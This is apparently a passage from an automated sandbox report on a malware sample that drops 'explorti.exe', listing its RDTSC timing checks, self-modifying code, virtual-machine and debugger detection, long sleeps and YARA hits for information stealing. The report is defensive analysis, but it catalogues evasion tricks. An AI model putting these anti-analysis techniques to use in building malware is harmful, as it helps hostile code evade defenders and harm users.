                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54202D7 second address: 54202DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54202DB second address: 54202E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54202E1 second address: 5420319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B774h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C1B777h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420319 second address: 5420331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420331 second address: 542039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F46FA729A4Fh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4688C1B774h 0x00000018 adc ecx, 42366918h 0x0000001e jmp 00007F4688C1B76Bh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F4688C1B776h 0x0000002c jmp 00007F4688C1B775h 0x00000031 popfd 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 542039F second address: 54203A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54203A3 second address: 54203EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edx, dword ptr [esi+44h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4688C1B779h 0x00000013 jmp 00007F4688C1B76Bh 0x00000018 popfd 0x00000019 jmp 00007F4688C1B778h 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54203EF second address: 5420426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or edx, dword ptr [ebp+0Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movzx eax, bx 0x00000013 pushfd 0x00000014 jmp 00007F4688C929DDh 0x00000019 sbb al, FFFFFF86h 0x0000001c jmp 00007F4688C929E1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420426 second address: 5420471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 51h 0x00000005 pushfd 0x00000006 jmp 00007F4688C1B778h 0x0000000b and ch, 00000058h 0x0000000e jmp 00007F4688C1B76Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test edx, 61000000h 0x0000001d pushad 0x0000001e mov ax, B22Bh 0x00000022 mov bx, cx 0x00000025 popad 0x00000026 jne 00007F46FA729989h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420471 second address: 5420477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410811 second address: 5410820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410820 second address: 5410826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410826 second address: 541082A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 541082A second address: 541082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 541082E second address: 54108E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4688C1B777h 0x0000000f and esp, FFFFFFF8h 0x00000012 pushad 0x00000013 mov cx, AA0Bh 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop edx 0x0000001a pushfd 0x0000001b jmp 00007F4688C1B76Ah 0x00000020 jmp 00007F4688C1B775h 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F4688C1B76Ch 0x00000030 add ecx, 28E3CE78h 0x00000036 jmp 00007F4688C1B76Bh 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f mov cx, bx 0x00000042 jmp 00007F4688C1B777h 0x00000047 popad 0x00000048 xchg eax, ebx 0x00000049 jmp 00007F4688C1B776h 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F4688C1B76Ah 0x00000058 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54108E2 second address: 54108F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54108F1 second address: 54109A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4688C1B771h 0x0000000f xchg eax, esi 0x00000010 jmp 00007F4688C1B76Eh 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 pushad 0x0000001a mov dh, cl 0x0000001c call 00007F4688C1B779h 0x00000021 pop esi 0x00000022 popad 0x00000023 call 00007F4688C1B771h 0x00000028 pop ebx 0x00000029 popad 0x0000002a sub ebx, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F4688C1B774h 0x00000034 pushfd 0x00000035 jmp 00007F4688C1B772h 0x0000003a add eax, 094E5648h 0x00000040 jmp 00007F4688C1B76Bh 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54109A3 second address: 5410A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c movzx ecx, bx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 popad 0x00000014 je 00007F46FA7A8399h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F4688C929E7h 0x00000021 adc eax, 59B0CE9Eh 0x00000027 jmp 00007F4688C929E9h 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F4688C929E0h 0x00000033 adc ecx, 30B2C098h 0x00000039 jmp 00007F4688C929DBh 0x0000003e popfd 0x0000003f popad 0x00000040 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000047 pushad 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007F4688C929E2h 0x0000004f sbb ax, 6AF8h 0x00000054 jmp 00007F4688C929DBh 0x00000059 popfd 0x0000005a popad 0x0000005b call 00007F4688C929DFh 0x00000060 mov eax, 45CE1B1Fh 0x00000065 pop esi 0x00000066 popad 0x00000067 mov ecx, esi 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F4688C929DEh 0x00000070 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410A84 second address: 5410A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410A96 second address: 5410AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F46FA7A82DBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C929DAh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410AB0 second address: 5410AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410AB6 second address: 5410ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410ABA second address: 5410B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 popad 0x00000017 jne 00007F46FA731043h 0x0000001d jmp 00007F4688C1B772h 0x00000022 mov edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007F4688C1B773h 0x0000002f popad 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410B0D second address: 5410B35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 mov di, ax 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410B35 second address: 5410B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410B3B second address: 5410B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410B4A second address: 5410B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410B50 second address: 5410B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4688C929DCh 0x00000010 sbb cl, FFFFFFC8h 0x00000013 jmp 00007F4688C929DBh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F4688C929E6h 0x00000021 xor ah, 00000028h 0x00000024 jmp 00007F4688C929DBh 0x00000029 popfd 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410B9E second address: 5410C4F instructions: 0x00000000 rdtsc 0x00000002 call 00007F4688C1B778h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 push edx 0x00000011 mov esi, 51A8011Bh 0x00000016 pop ecx 0x00000017 popad 0x00000018 mov dword ptr [esp], ebx 0x0000001b jmp 00007F4688C1B777h 0x00000020 push dword ptr [ebp+14h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F4688C1B774h 0x0000002a or esi, 01E4FC48h 0x00000030 jmp 00007F4688C1B76Bh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F4688C1B778h 0x0000003c sbb ax, 3EA8h 0x00000041 jmp 00007F4688C1B76Bh 0x00000046 popfd 0x00000047 popad 0x00000048 push dword ptr [ebp+10h] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007F4688C1B76Bh 0x00000053 mov ax, 408Fh 0x00000057 popad 0x00000058 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410CDA second address: 5410CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410CDE second address: 5410CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410CE4 second address: 5410D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b jmp 00007F4688C929E0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4688C929DAh 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410D15 second address: 5410D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420E07 second address: 5420E7C instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, esi 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov di, A6D2h 0x00000010 jmp 00007F4688C929E3h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov eax, 19CD9A0Bh 0x0000001d jmp 00007F4688C929E0h 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F4688C929DEh 0x0000002c sbb ecx, 077A3348h 0x00000032 jmp 00007F4688C929DBh 0x00000037 popfd 0x00000038 mov dx, si 0x0000003b popad 0x0000003c pop ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F4688C929DCh 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420E7C second address: 5420E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420E82 second address: 5420E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420BBC second address: 5420BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B76Ch 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420BE6 second address: 5420BFA instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, cx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, 7Bh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420BFA second address: 5420C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4688C1B777h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420C24 second address: 5420C4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 2A4Ah 0x00000007 mov bh, A1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C929E9h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420C4D second address: 5420C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Special instruction interceptor: First address: 1CEE25 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Special instruction interceptor: First address: 1CEEFF instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Special instruction interceptor: First address: 363775 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Special instruction interceptor: First address: 38FF78 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Special instruction interceptor: First address: 1CEDF9 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Special instruction interceptor: First address: 3F3B3C instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: EFEE25 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: EFEEFF instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 1093775 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 10BFF78 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: EFEDF9 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 1123B3C instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Code function: 0_2_05490C90 rdtsc 0_2_05490C90
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 364
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1396 Thread sleep count: 32 > 30
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1396 Thread sleep time: -64032s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8184 Thread sleep time: -60030s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156 Thread sleep count: 364 > 30
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156 Thread sleep time: -10920000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5924 Thread sleep time: -360000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8176 Thread sleep time: -52026s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8172 Thread sleep count: 31 > 30
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8172 Thread sleep time: -62031s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1104 Thread sleep count: 31 > 30
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1104 Thread sleep time: -62031s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
                    Source: explorti.exe, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
                    Source: explorti.exe, 00000007.00000002.2880581504.0000000000729000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: gNo9ad9KO4.exe, 00000000.00000002.1680292366.0000000000344000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1706138398.0000000001074000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1720919181.0000000001074000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe System information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Code function: 0_2_05490C90 rdtsc 0_2_05490C90
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00EC643B mov eax, dword ptr fs:[00000030h] 7_2_00EC643B
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00ECA1A2 mov eax, dword ptr fs:[00000030h] 7_2_00ECA1A2
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                    Source: explorti.exe, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: yHProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00EAD2E8 cpuid 7_2_00EAD2E8
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00EACAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 7_2_00EACAED
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00E96590 LookupAccountNameA, 7_2_00E96590

                    Stealing of Sensitive Information

                    Source: Yara match File source: 7.2.explorti.exe.e90000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.gNo9ad9KO4.exe.160000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.explorti.exe.e90000.0.unpack, type: UNPACKEDPE
